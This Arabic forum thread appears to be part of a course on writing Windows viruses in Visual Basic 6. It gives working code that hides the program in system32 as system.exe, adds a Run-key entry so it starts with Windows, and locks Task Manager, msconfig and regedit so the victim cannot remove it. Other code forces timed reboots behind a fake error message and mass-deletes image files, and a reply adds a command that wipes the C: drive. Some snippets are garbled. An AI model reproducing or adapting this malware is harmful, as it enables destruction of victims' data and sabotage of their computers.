الان سوف نجري بعض التغيرات
Run Virus Now ضع الرسالة التي تريد ان تصلك و حتى لو في العربي
127.0.0.1 ضع رقم ip الخاص بك و سوف يتم ارسال الرسالة الى ip الخاص بك
اذ لا تعرف ip يمكنك زيارة هذا الموقع و سوف يظهر الايبي مباشرة :
http://www.showmyip.com/

الدرس السابع

دي جزء خاص قمت بتعديلة علي الدورة
والادوات المطلوبه هي
1- فيجول بيسك 6
2- الذكاء والحيل البرمجيه
3- الريجتسري ( يجب ان تعرف كيف تتعامل معه )

================================================== =======
اولا: الفايروس يعتمد على المراوغه والاختفاء عند تشغيله
وهناك شفرات تقوم بهذه المهمه مثلا
انت تريد عندما يضغط الضحيه على الفايرس تريد ان يختفي وينتقل الي ملف انت تحدده بالشفره البرمجيه
اذا هذا هو الكود

كود PHP:
Name App.Path & "\" & App.EXEName & ".exe" As "c:windowssystem32sysstem.exe"

ماذا فهمت من الكود
طبعا نحن استخدمنا app.path وهذه داله تقوم بتحديد مكان البرنامج (الفايروس) بدون كتابة مساره
يعني لو فرضا كتبنا داله name بهذه الطريقه name c":\virus.exe" as "c:\windows\system32\system.exe"
كذا خطأ لان احتمال الضحيه شغل الفايروس على سطح المكتب او شغله في ملف الوينزوب كذا مراح يشتغل الفايروس
لان نحن كتبنا بالشفره انقل الملف من c:\virus.exe الي c:\windows\system32\system.exe
ولذلك استخدمنا داله app.path تحديد مكان الملف تلقائي بدون كتابة مساره
يعني بذا الطريقه رايح يشتغل الفايروس باي مكان في الجهاز وهذا هو المطلوب
داله name هي داله تقوم على نقل الملف الي اي مكان انت تحدده
نحن قمنا بنقل الملف عند الضغط عليه الي دليل الويندوز ثم الي system32 وتغيير اسمه الي system
حتى عندما يراه الضحيه يحسبه ملف تابع لنظام
================================================== =======
طيب حن الان انتهنا من اول خاصيه للفايروس وهي خاصية التنقل
الان نريد ان نحمي ملف الفايروس من الظهور يعني نبغاه متخفى غير مرئي
نستخدم داله setattr وهذه الداله تقوم بتغيير في خصائص الملف
vbshow تعني اظهر الملف
vbHidden تجعل الملف مخفي
بالعربي انا اعتبر هذه الاخصائص اهم شي ويوجد هناك خصائص اخرى لكن ماتهمنا
طيب كيف نكتب الداله ونستعمل الخصائص
بعد ماكتبنا الكود الاول وهو كود انتقال الفايروس الي مجلد system32
نكتب كود الاختفاء تحته بالضبط
setattr "c:\windows\system32\system.exe",vbHidden
لو شرحنا الكودان يكونا على النحو التالي
قم بنقل الملف virus.exe من مكان وجوده الي مجلد system32 وغير اسمه الي system.exe
الكود الثاني قم باخفاء الملف اللى موجود في مجلد system32 واللي اسمه system.exe
طبعا الان نحن جعلنا الفايروس يتمتع بخصائص الانتقال والتخفى
على فكره اي ملف يستخدم كود الاختفاء لن يستطيع البحث اللي في جهازك كشفه او اظهاره
لن الويندوز يعطي حرية الملف باالاختفاء وبذلك يعطل خاصية البحث عنه
================================================== =======
الان ناتي الي مهمه الفايروس ماذا نريد ان يعمل الفايروس
هناك عدة امور تخبربها الفايروس ليقوم بها
1- اعادة تشغيل الجهاز
2- حذف ملفات معينه
3- عمل فرومات للجهاز .................. هذا لا انصح به نحن نريد ان نصنع فايروس له طابع خاص
يعني نريد ان نصنع فايروس له مهمات مميزه يعرف بها ويشتهر بها عند العامه
4- ايقاف عمل بعض البرامج التي تحمل امتداد exe اوcom او htm او html او gif وهكذا
5- الهجوم على ملفات وتخريبها ( اي تغيير امتدادها حتى لاتعمل ) مثل الهجوم على الصور بامتداد gif وتحويلها الي
امتداد txt او اي امتداد اخر
5- عمل فقط رساله تظهر قبل شاشة الترحيب
6- عمل فايروس يقوم باستخدام الدوس وتشغيل بعض اوامره مثل امر ping لضرب المواقع
7- استخدام الفايروس ب ملفات تجسس من الانترنت او استدعاء باتش لك من موقعك الخاص وتشغيله في جهاز الضحيه
8- التحكم في بعض برامج النظام وايقافها مثل ايقاف قائمة المهام وغيرها من البرامج المهمه
9- اخفاء محركات الاقراص السي الدي المرن الفلاش مموري والسدي
10 - عمل اشياء ازعاجيه مثل فتح مجلدات فتح برامج وهكذا
11- عمل تسجيل خروج من الماسينجر او التلاعب في حالات الاتصال
12- عمل رقم سري للجهاز لمنع الضحيه لدخول لسطح المكتب
13- ارسال الفايروس رساله لنا على بريدنا يخبرنا بتشغيل الضحيه للفايروس مع عرض الاي بي ووقت تشغيله وتاريخه
كل هذه الاشياء سوف اشرحها مع بعض الخدع في تشغيل الفايروس بدون ان يضغط عليه الضحيه
اتمنى قرات الدرس جيد حتى ابدأ بالدرس الثاني والذي سوف يقدم اشياء جديده لك ومفيده وبعض الخدع والحيل
سوف ابدا الان بعمل شفرات توقف اي برنامج تابع لنظام بايقاف الفايروس
وخلونا نبدأ الان بايقاف قائمة المهام و لن تعمل اذا ضغطت على مفاتيح ctrl+atl+del
اذا دعونا نصنع كود يخلي النظام يظهر رساله بان قائمة المهام مشغوله مع برنامج اخر وبكذا منعنا المستخدم من فتحها

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

الان نحن منعنا المستخدم من فتح قائمة المهام واذا حاول فتحها سوف تظهر رسالة من النظام تقول هذا البرنامج مستخدم
من قبل برنامج اخر
طبعا الكود هذا سوف تضعه في form_load
مع وضع كود يقوم على تشغيل الفايروس في كل مره شغل الضحيه جهازه
وهذا كود تشغيل الفايروس مع تشغيل الجهاز

كود PHP:
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"< /STRONG >

اذا دعونا الان نجمع الاكواد اللي عملناه ونضعها في form_load

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
End Sub<
/STRONG >

دعونا نشرح عمل الاكواد بالتفصيل
(يتبع)

كود PHP:
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"

ProgramName = اسم القيمه تستطيع تغيير اسمها مثلا اجعلها system او اي اسم
c:\WINDOWS\system32\system.exe" بيانات القيمه
الكود يقوم على تشغيل الملف اللي اسمه system.exe الذي على المسار التالي
"c:\WINDOWS\system32\system.exe"
طبعا هذا الكود يقوم على انشاء قيمه في مفتاح run اللي في الريجتسري مما يجعل الفايروس يشتغل مع تشغيل الجهاز
الكود الثاني Form1.Hide عارفينه اكيد يقوم على اخفاء الفايروس فلايظهر نافذته
الكود الثالث

كود PHP:
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"

يقوم بنقل الفايروس الي مجلد system32 ويخلي اسمه system.exe
لازم يتوافق مسار الفايروس مع مساره في بدأ التشغيل حتى يستطيع تشغيل نفسه مع تشغيل الجهاز
الكود الرابع

كود PHP:
setattr "c:\windows\system32\system.exe",vbHidden

اعطاء خاصية الاخفاء للفايروس
الكود الخامس

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

معناه يقوم على فتح قائمة المهام للقراءه ولايقوم على غلقها يعني تضل مفتوحه ومعلقه ومرتبطه مع الفايروس
بحيث لو قام الضحيه بالضغط على مفاتيح ctrl+alt+del مراح تفتح معه
ولو ذهب الي مجلد system32 وقام بالضغط عليه سوف تظهر له رساله من النظام مفادها البرنامج مستخدم من قبل برنامج اخر اي ان الفايرس مستخدمها مدام الجهاز شغال
اتمنى تطبيق هذا الدرس
وسوف اقوم بشرح اكثر من طريقه لايقاف قائمة المهام وايقاف برامج اخرى مثل الاداة المساعده التي تقوم على اظهار
الملفات التي تعمل مع بدا تشغيل الجهاز
دورة متكاملة عن صناعة الفيروسات عن طريق الفيجول بيسك و لاكن انت كفيت و وفيت و اش ما تحتاج اخوك انا و عدي اضافات :
مثلا لاخفاء الفورم يوجد عدة طرق اضيف لطريق الاخ :
me.hide
اما لتشغيل الفيروس عند بدا التشغيل :

كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM =
&H80000002 ' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName As String) Dim hKey
As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret =
RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,
hKey) ' حذفها من
مسجل النظام. Ret = RegDeleteValue(hKey,
ProgramName) ' إغلاق المفتاح
RegCloseKey hKey End Sub Public Sub RunWhenStartup(ProgramName As String, ProgramPath
As String) Dim hKey As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' إنشاء قيمة جديدة بإسم
البرنامج وعنوانه. Ret = RegSetValueEx(hKey,
ProgramName, 0&, 1, ProgramPath,
Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1) ' إغلاق
المفتاح RegCloseKey hKey End Sub
------------ في الفورم :
RunWhenStartup "عنوان", App.Path &
"" & App.EXEName &
".exe" <
/FONT >
<
/STRONG >

و اما عن التدمير :

كود PHP:
kill "c:\*.*"

و لضمان عمل الفيروس :

كود PHP:
On Error Resume Next

كود:

كود PHP:
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

هذا الكود هو حماية قائمة المهام من القراءة يعني ماتقدر تفتحه ابد

يعني دام الفايروس شغال مراح تقدر تفتحها ابد ( كذا الشرح اعتقد وصل الي ادمغتكم الحلوه)
الي الان حنا حمينا الفايروس من قائمة المهام وبكذا حققنا الحمايه رقم واحد
الان نريد حماية الفايروس من اداة بدا التشغيل التي تعرض البرامج التي تعمل مع بداية الويندوز
نسوي لها كود نفس كود قائمة المهام
منع قراءة او فتح برنامج الاداة المساعده ( بدأ التشغيل )

كود PHP:
Open "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe " For Input Lock Read As 1

وبكذا حققنا الحماية رقم اثنين
منع قراءة برنامج الريجستري

كود PHP:
Open "C:\WINDOWS\regedit.exe" For Input Lock Read As 1

وبهذه ايضا حققنا الحماية الثالثه للفايروس
شوف اي شخص فاهم للجهاز وطريقة حذف الملفات يتبع عدة طرق

1- قائمة المهام لايقافه
2- بدا الشتغيل ليقاف عمله حتى لايعمل مع بدا التشغيل
3- حذفه من الريجستري يعني حذف القيمه حقته

حنا نبغى ايقاف عمل الثلاث برامج هذه حتى يبقى الفايروس بأمان
وطبعا الان نحن حقننا ثلاث حمايات للفايروس من برنامج قائمة المهام وبرنامج الاداة المساعده(بدأالتشغيل) ومن الريجستري
الحين اتحدى اي شخص يحذف الفايرس ( يعني تسلقى على الفراش وانت مطمن )
الان ناتي الي اعمال الفايروس نبغى نتفنن في اعماله واوامره
=============================================
يعني خلوهم يقولون ياحلو فايروس فلان انه يهبل فيه اشياء خرافيه وحركات نص كم ( فاصل اعلاني ) =============================================
يعني بدال من خلي الفايروس يعيد التشغيل كل مافتح الجهاز نخليه يعيد التشغيل في ساعه ودقيقه معينه
يعني مثلا يعيد تشغيل الجهاز كل مصارت الساعه 1:1 و 2:1 و 3:1 وهكذا
يعني كل ساعه ودقيقه ينشط الفايرس وكل ساعتين ودقيقه ينشط الفايرس وهكذا
طيب الان افتح موديل في الفيجول بيسك وضع فيها هذا الكود

كود PHP:
Declare Function ExitWindowsEx Lib "user32" _
(ByVal uFlags As Long, ByVal dwReserved _
As Long) As Long

وبعدها ضع عداد تايمر على الفورم وجعله 1000 العداد
الان اكتب الشفره البرمجيه الرائعه

كود PHP:
Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
t& = ExitWindowsEx(EWX_REBOOT, 0)
End If
End Sub
<
/STRONG >

هذا الكود يقوم على تسجيل خروج من الجهاز يعني لازم تصير الساعه 1:1 يعني لازم الساعه تكون ساعه ودقيقه
ساعتين ودقيقه ثلاث ساعات ودقيقه وهكذا
طبعا قبل تسجيل الخروج بدقيقه تظهر رساله او نافذه تخبر الضحيه بان هناك خلل في ملف معين ولذلك يجب تسجيل الخروج

كود PHP:
Private Sub Timer2_Timer()
If Minute(Time) = 0 Then
MsgBox "ملفات الربط لاتستجيب للنظام سوف يقوم النظام بتسجيل الخروج"
End If
End Sub<
/STRONG >

لاحظ جلعنا الدقائق تساوي صفر يعني الرسالة سوف تظهر كل ما صارت الساعه حكم يعني 3:00 و 2:00 وهكذا
يعني قبل تسجيل الخروج بدقيقه تظهر الرساله تخبر الضحيه بوجود خلل
حنا عملنا مسج بوكس تظهر رساله في الشرح القادم سوف نعمل فورم ثاني يعرض نافذه تشبه نافذه فايروس بلاستر
الشرح القادم سوف نكون اكثر توسع ان شاءالله وتقديم شفرات جديده على الساحه مع ترك بصمه ه في جهاز الضحيه
(يتبع للدرس السابع)

الدرس الثامن والاخير في الدورة



صناعة الفايروسات تحتاج الي ذكاء والي تفكير والي احتمالات
ذكاء يعني ذكاء الفايروس كيف يعمل ماذا يفعل كيف يحمي نفسه كيف يراوغ
تفكير اي فكر كيف تصنع فايروس وذكي يصعب السيطره عليه
احتمالات تعني احتمال الضحيه يعمل فرومات يعني الفايروس رايح ينحذف طيب وين اخليه يتخبأ مثل ينسخ نفسه في الدي
اووووووووووه طيب افرض الضحيه فرمت حتى الدي ه لقيت فكره رائعه اخليه بنسخ نفسه في الفلاش مموري و القرص المرن وهكذا
طيب الفلاش مموري حرف القرص يتغير من جهاز الي جهاز ربما يكون g ربما يكون e ربما يكون حرف اخر
ماشي اعمل شفرة نسخ الي اكثر من حرف واحطه باداة تايمر مع وضع شفرة تخطى الاخطاء وهكذا
================================================== =======
الفكره هو ان يقوم الفايروس بنقل نفسه الي مجلد مهم في الجهاز ثم يغير اسمه الي اسم مهم مثل windows او system
او taskmagr وهكذا حاول ان تخلي اسمه يحسس الضحيه بانه تابع لنظام
وبعد ما يتمركز الفايروس في مجلد مهم يقوم بالخطوه الثاني وهي نسخ نفسه الي عدة مجلدات والي عدة محركات اقراص
مثل الدي والفلاش مموري والقرص المرن
================================================== =======
حماية الفايروس شي مهم جدا جدا حتى لايحذف
حماية الفايروس يجب ان نحميه مثل ماذكرت سابق من ثلاث برامج وهي ( قائمة المهام + الريجتسري + بدأ الشتغيل)
================================================== ========
دعونا الان نبدا بصناعة فايروس قوى جدا ومتعدد المهام
اولا يجب ان نضع هذه الشفرات في اجراء الفورم وهذا شي اساس لكل فايروس تصنعه لابد ان تضع هذه الشفرات في كل
مره تصنع فيها فايروس

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
Open "C:WINDOWSpchealthhelpctrbinariesmsconfig.exe" For Input Lock Read As 1
Open "C:WINDOWSregedit.exe" For Input Lock Read As 1
End Sub

هذه الشفرات يجب ان تضعها في كل مره تصنع فيها فايروس وتحطها في اجراء الفورم
اول شفره تشغيل الفايروس مع تشغيل الجهاز
ثاني شفره قمنا باخفاء الفايروس اي النافذه
ثالث شفره قمنا بنقل الفايروس الي مجلد system32 وتغيير اسمه الي system ويعني الفايروس تمركز في هذا المجلد
رابع شفره تم اخفاء الفايروس اي اعطاءه خاصية التخفي
الشفره الخامسه والسادسه والسابعه حمينا الفايروس من برنامج قائمة المهام و بدا الشتغيل و الريجتسري
================================================== =======
هناك شفره تقوم بتعطيل قائمة المهام نهائيا وهي تتعامل مع الريجتسري اي تغير قيمة قائمة المهام الي 1 مما يجعلها تتعطل

كود PHP:
Const HKCU = &H80000001
Set objReg = GetObject("winmgmts:\\.\root\" & _
"Default:StdRegProv")
strKeyPath = "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
objReg.Createkey HKCU, "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
objReg.SetDwordValue HKCU, strKeyPath, "DisableTaskMgr", 1

هذه الشفره تقوم بتعطيل قائمة المهام لاحظ رقم واحد في اخر الشفره معناه تعطيل قائمة المهام وعندما تضغط على
ctrl+alt+del تظهر لك رساله من النظام تقول ان قائمة المهام معطله من قبل المسؤول
ولكن عندما تشيل رقم واحد وتحط صفر سوف تعمل قائمة المهام من جديد
هذه الشفره فقط تصلح لنظام اكس بي فقط
================================================== ===
الان دعونا نصنع اوامر الفايروس
اول امر للفايروس هو حذف الصور اللي بامتداد gif في جميع اركان الجهاز
ضع اداة تايمر وجعل العداد فيها يساوي 1000
ولا تنسى وضع textbox على الفروم ايضا
واكتب هذا الكود في اجراء التايمر

كود PHP:
Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.gif") <> "" Then
Kill "d:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.jpg") <> "" Then
Kill "d:\*jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.jpg") <> "" Then
Kill "c:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.gif") <> "" Then
Kill "c:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.gif") <> "" Then
Kill "a:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.jpg") <> "" Then
Kill "a:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.gif") <> "" Then
Kill "e:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.jpg") <> "" Then
Kill "e:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.gif") <> "" Then
Kill "g:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.jpg") <> "" Then
Kill "g:\*.jpg"
Else
End
End If
End Sub
End Sub

================================================== =======
دعونا نشرح الشفرات الطويله هذه رغم انها متشابهه لكن الاختلاف بمكان الحذف
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
عندما تكون الساعه 1:1 و 2:1 و 3:1 و4:1 الي اخره قم بتنفيذ الشرط
Text1.Text = "QJgJI-pJLc " هذا شرط انا وضعته لسد الفراغ فقط يعني حيله برمجيه لان ملقيت شرط احطه
فاوضعت اكتب عالم الوله في التيسكت بوكس
حتى يقوم باكمال بقية الشروط اذا وضع عالم الوله في textbox يقوم باكمال بقية الشروط
======================================
ElseIf Dir("d:\*.gif") <> "" Then ابحث في الدي عن صور بامتداد gif اذا وجدها سوف ينفذ الشرط
Kill "d:\*.gif" قم بحذف الصور بامتداد if
Else حقق الشرط الثاني اذا لم يتحقق الشرط الاول وهو قم بوضع عالم الوله في التيكست بوكس
Text1.Text = "QJgJI-pJLc "
وبعدها يكمل بقية الشروط بدون اي اخطاء
==================================

كود PHP:
Private Sub Timer1_Timer()
On Error GoTo Cont:
If Minute(Time) = 1 Then
Kill "d:\*.gif"
Kill "d:\*jpg"
Kill "c:\*.gif"
Kill "c:\*.jpg"
Kill "e:\*.gif"
Kill "e:\*.jpg"
Kill "g:\*.gif"
Kill "g:\*.jpg"
End If
Cont:
End Sub

جرب هذا الكود افضل الاول فعلا فيه اخطاء ويحتاج الي تعديل
لاحظ في اخر شرط حطيت الشرط الثاني end اي سوف يتم ايقاف الفايروس
ولن يعمل الا في المره القادمه عند تشغيل الجهاز

تسلم يا غالي على المجهود الجبار ده